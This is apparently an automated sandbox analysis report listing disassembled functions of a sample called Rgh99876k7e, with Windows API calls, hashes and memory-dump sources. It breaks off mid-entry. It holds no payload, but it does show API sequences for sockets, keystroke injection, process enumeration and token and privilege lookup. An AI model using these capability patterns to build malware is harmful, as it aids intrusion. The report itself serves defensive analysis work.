                          Similarity
                          • API ID: FromProg$FreeTask_memcmp
                          • String ID:
                          • API String ID: 314563124-0
                          • Opcode ID: 63ae7ac9f38084293e1aab0b18ad6bfd194c17c47346972ca817910db2e20a32
                          • Instruction ID: cecab9d085c0c9f4333dca2064260285842cf157e4d61385ca9ba3dea3e9b7ad
                          • Opcode Fuzzy Hash: 63ae7ac9f38084293e1aab0b18ad6bfd194c17c47346972ca817910db2e20a32
                          • Instruction Fuzzy Hash: 32810C75A00109EFCF04DF94C988DEEB7B9FF89315F204558E906AB251DB75AE06CBA0
                          Function 00741391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 83de5bffd2dcbbbda58a096fe8e5069bb70a982308465341c59e67ad53d60b1b
                          • Instruction ID: ba9050f0a8a75d28ff0ba90dd2cdb4507bda0d600de6b55a534ea2843565d619
                          • Opcode Fuzzy Hash: 83de5bffd2dcbbbda58a096fe8e5069bb70a982308465341c59e67ad53d60b1b
                          • Instruction Fuzzy Hash: 10412C32A40154EBEB217BFDAC49ABE3AF4FF42370F544236F419D6192E77C88815661
                          Function 00796278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(0191F278,?), ref: 007962E2
                          • ScreenToClient.USER32(?,?), ref: 00796315
                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00796382
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          • Opcode ID: 9fd78ba9ae18b2246d84e6e5411b52e7808167af9640aab13c4091a818bfe0f2
                          • Instruction ID: 22373301f3b603230f01ceaa5c0fb29679d43bda3cf6897aa7599df79769baaf
                          • Opcode Fuzzy Hash: 9fd78ba9ae18b2246d84e6e5411b52e7808167af9640aab13c4091a818bfe0f2
                          • Instruction Fuzzy Hash: D0515F75A00249EFDF11DF68E8819AE7BB5FF45360F10825AF9159B2A0D734ED81CB50
                          Function 00781AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                          Download Yara Rule
                          APIs
                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00781AFD
                          • WSAGetLastError.WSOCK32 ref: 00781B0B
                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00781B8A
                          • WSAGetLastError.WSOCK32 ref: 00781B94
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast$socket
                          • String ID:
                          • API String ID: 1881357543-0
                          • Opcode ID: 8425e966b7bbf88613793e5012e460ca924fa1413c411c8f25aeac01c347de59
                          • Instruction ID: 083511a474089057c0497f146a0908ba4080c9aa14446108eaa12b6cce0e043c
                          • Opcode Fuzzy Hash: 8425e966b7bbf88613793e5012e460ca924fa1413c411c8f25aeac01c347de59
                          • Instruction Fuzzy Hash: 9F41D474640200EFE720AF24C88AF657BE5AB44718F54C558F91A9F3D2D77AED82CB90
                          Function 0073B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ac8b40d94a17ca8c39b1ea1666bedd1465778793436dfe5cfbeac11c3595ed0
                          • Instruction ID: f8f61441d4097ea5e0b417b75fe5055c62d49942a00f4c778d3fd5c917582bf4
                          • Opcode Fuzzy Hash: 5ac8b40d94a17ca8c39b1ea1666bedd1465778793436dfe5cfbeac11c3595ed0
                          • Instruction Fuzzy Hash: 36411776A00354FFE724AF38CC45B6ABBE9EB88710F10452AF241DB283D779A9518780
                          Function 007756D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00775783
                          • GetLastError.KERNEL32(?,00000000), ref: 007757A9
                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007757CE
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007757FA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateHardLink$DeleteErrorFileLast
                          • String ID:
                          • API String ID: 3321077145-0
                          • Opcode ID: 3dea21909d43ef416c269596e1bf0e5a42eeacffd113e889255769e71c5d832d
                          • Instruction ID: d7a17619469735df4e4c4d92e359acb1391c58b902e3385bd09c9d87e6903994
                          • Opcode Fuzzy Hash: 3dea21909d43ef416c269596e1bf0e5a42eeacffd113e889255769e71c5d832d
                          • Instruction Fuzzy Hash: A5412F35600610DFCF15DF15C548A5DBBE2EF49320B19C988E84A5B3A2CB78FD41CB91
                          Function 0073D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00726D71,00000000,00000000,007282D9,?,007282D9,?,00000001,00726D71,?,00000001,007282D9,007282D9), ref: 0073D910
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0073D999
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0073D9AB
                          • __freea.LIBCMT ref: 0073D9B4
                            • Part of subcall function 00733820: RtlAllocateHeap.NTDLL(00000000,?,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6,?,00701129), ref: 00733852
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          • API String ID: 2652629310-0
                          • Opcode ID: 833af07a3a00feeac52f829e7e91d2c6ee6aa2a3c08a1bc24f50632c5becd9f3
                          • Instruction ID: 5288ba8abb55f45047f30eaa47b05c88155b0bdf7efcf62e2afcfb6f48436e60
                          • Opcode Fuzzy Hash: 833af07a3a00feeac52f829e7e91d2c6ee6aa2a3c08a1bc24f50632c5becd9f3
                          • Instruction Fuzzy Hash: 0031CF72A0021AABEF25DF64EC45EAE7BA5EB40310F054169FC04D7252EB39ED51CBA0
                          Function 007952C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00795352
                          • GetWindowLongW.USER32(?,000000F0), ref: 00795375
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00795382
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007953A8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LongWindow$InvalidateMessageRectSend
                          • String ID:
                          • API String ID: 3340791633-0
                          • Opcode ID: f61e59901e9d2efea7ba2c11d332ee4469c0cede474944e1acbd491ecb8cfe6d
                          • Instruction ID: b76fe1173d85db752b44d5185500eb07e3234bff7fcff2eb0b117325e8e4d483
                          • Opcode Fuzzy Hash: f61e59901e9d2efea7ba2c11d332ee4469c0cede474944e1acbd491ecb8cfe6d
                          • Instruction Fuzzy Hash: 83310834A55A28FFEF329F54EC15FE83761AB05398F588102FA10961E1C7BC9D80DB51
                          Function 0076AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0076ABF1
                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0076AC0D
                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0076AC74
                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0076ACC6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 9986e2e9f6913c47b6dee714e664151915478677517033b438e7b3db62672416
                          • Instruction ID: c0ea41007369e815bd994ab0fb10db359bcb535c9eace2369461537d4c6c714f
                          • Opcode Fuzzy Hash: 9986e2e9f6913c47b6dee714e664151915478677517033b438e7b3db62672416
                          • Instruction Fuzzy Hash: E7310830A00618BFFF35CB658C09BFA7BA5AB45310F04421AE887A21D1D37D99859F72
                          Function 00797674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                          Download Yara Rule
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 0079769A
                          • GetWindowRect.USER32(?,?), ref: 00797710
                          • PtInRect.USER32(?,?,00798B89), ref: 00797720
                          • MessageBeep.USER32(00000000), ref: 0079778C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: 4e0e1e1bca6c3ee827617e592657e2c48b6b65971d16117df23b878c593f4122
                          • Instruction ID: b4f7045c86b005445fbccba92ba7d98c2517459a55c0208254553642ef0c337c
                          • Opcode Fuzzy Hash: 4e0e1e1bca6c3ee827617e592657e2c48b6b65971d16117df23b878c593f4122
                          • Instruction Fuzzy Hash: 9A41C034619254EFCF05CF98E894EA977F4FF49310F5580A9E4149B261C338E942CF90
                          Function 007916DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32 ref: 007916EB
                            • Part of subcall function 00763A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00763A57
                            • Part of subcall function 00763A3D: GetCurrentThreadId.KERNEL32 ref: 00763A5E
                            • Part of subcall function 00763A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007625B3), ref: 00763A65
                          • GetCaretPos.USER32(?), ref: 007916FF
                          • ClientToScreen.USER32(00000000,?), ref: 0079174C
                          • GetForegroundWindow.USER32 ref: 00791752
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          • Opcode ID: e3e9739220003e686fe6c07a6f735a753ccc1ed224f70a3eb962f730e1cbd041
                          • Instruction ID: 223bc1d5fc9aae36ba6887397351b906deac8eeba09e24ca5362e2d2de1bc0c9
                          • Opcode Fuzzy Hash: e3e9739220003e686fe6c07a6f735a753ccc1ed224f70a3eb962f730e1cbd041
                          • Instruction Fuzzy Hash: EC319471D00149EFDB00DFA5C885CAEB7FDEF48304B5481AAE415E7251DB34AE41CBA0
                          Function 0076D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0076D501
                          • Process32FirstW.KERNEL32(00000000,?), ref: 0076D50F
                          • Process32NextW.KERNEL32(00000000,?), ref: 0076D52F
                          • CloseHandle.KERNEL32(00000000), ref: 0076D5DC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: c668a71f97e4488888ae3d11a109051bfedfd46fbc96917d7ac772022332fd3e
                          • Instruction ID: fa896d1c4f3b7c98645d36419d46c9f47cfe8cee7c2079dd2e588b83bfa99d66
                          • Opcode Fuzzy Hash: c668a71f97e4488888ae3d11a109051bfedfd46fbc96917d7ac772022332fd3e
                          • Instruction Fuzzy Hash: 2931C471508300DFD311EF54C885AAFBBF8EF99344F14052DF682821E2EB759945CBA2
                          Function 00798FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          • GetCursorPos.USER32(?), ref: 00799001
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00757711,?,?,?,?,?), ref: 00799016
                          • GetCursorPos.USER32(?), ref: 0079905E
                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00757711,?,?,?), ref: 00799094
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                          • String ID:
                          • API String ID: 2864067406-0
                          • Opcode ID: 68a329ee68990c4b9dd7a64c1f55bc81164c87c13ea0a7a47a863f5df506a0ca
                          • Instruction ID: d3e2633b40c425041a3c917a70a464b6cd9413ea046a16da552c71f5ec5fc6dd
                          • Opcode Fuzzy Hash: 68a329ee68990c4b9dd7a64c1f55bc81164c87c13ea0a7a47a863f5df506a0ca
                          • Instruction Fuzzy Hash: CB21B135600018FFDF268F9DD858EEA7BB9EB49350F10405AF61547261C33AA9A1DB60
                          Function 0076D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNEL32(?,0079CB68), ref: 0076D2FB
                          • GetLastError.KERNEL32 ref: 0076D30A
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0076D319
                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0079CB68), ref: 0076D376
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateDirectory$AttributesErrorFileLast
                          • String ID:
                          • API String ID: 2267087916-0
                          • Opcode ID: 8483d3bcdbec73650e797ce9e864e2ab4eb2696e02ae9b30a0251a4b64649bad
                          • Instruction ID: fe2bf9ffbe6593aa59cb6f44af35d170e634a015c0758862fb1f4ea5123fa144
                          • Opcode Fuzzy Hash: 8483d3bcdbec73650e797ce9e864e2ab4eb2696e02ae9b30a0251a4b64649bad
                          • Instruction Fuzzy Hash: AD219170A14201DFC720DF25C88586AB7E4AE55324F504A1DF89AC73E1E738DD46CB93
                          Function 00761571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00761014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0076102A
                            • Part of subcall function 00761014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00761036
                            • Part of subcall function 00761014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00761045
                            • Part of subcall function 00761014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0076104C
                            • Part of subcall function 00761014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00761062
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007615BE
                          • _memcmp.LIBVCRUNTIME ref: 007615E1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00761617
                          • HeapFree.KERNEL32(00000000), ref: 0076161E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                          • String ID:
                          • API String ID: 1592001646-0
                          • Opcode ID: 48b15b3f7e1badc3cec81370d83fd1af516145718ce50bc5b925b300014eb0e5
                          • Instruction ID: dfb20ac7cdf1dc4e77b1733c1743c1aa24073530d49f414592d73df3ce2477f7
                          • Opcode Fuzzy Hash: 48b15b3f7e1badc3cec81370d83fd1af516145718ce50bc5b925b300014eb0e5
                          • Instruction Fuzzy Hash: 0C21A171E40108EFDF01DFA8C949BEEB7B8EF44354F498459E842A7241EB38AE05CB60
                          Function 00792782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 0079280A
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00792824
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00792832
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00792840
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          • Opcode ID: 1d96abfcd37d01ecc3fa99691e93c76f235a76a0bcee715d6f79fbd175566c0a
                          • Instruction ID: 76d88a5f65a10c564ce8dc2d9869464f1c21840551da61a9c2032207f37cce50
                          • Opcode Fuzzy Hash: 1d96abfcd37d01ecc3fa99691e93c76f235a76a0bcee715d6f79fbd175566c0a
                          • Instruction Fuzzy Hash: DF21AE31204511BFDB15AB24D849FAA7BA5AF45324F248259E4268B6E3CB79EC43C790
                          Function 007678F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00768D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0076790A,?,000000FF,?,00768754,00000000,?,0000001C,?,?), ref: 00768D8C
                            • Part of subcall function 00768D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00768DB2
                            • Part of subcall function 00768D7D: lstrcmpiW.KERNEL32(00000000,?,0076790A,?,000000FF,?,00768754,00000000,?,0000001C,?,?), ref: 00768DE3
                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00768754,00000000,?,0000001C,?,?,00000000), ref: 00767923
                          • lstrcpyW.KERNEL32(00000000,?), ref: 00767949
                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00768754,00000000,?,0000001C,?,?,00000000), ref: 00767984
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen
                          • String ID: cdecl
                          • API String ID: 4031866154-3896280584
                          • Opcode ID: 0c0438bf49a932e3f5febb735295a47a27de585b5bc9a99edfb681ef569dbb5d
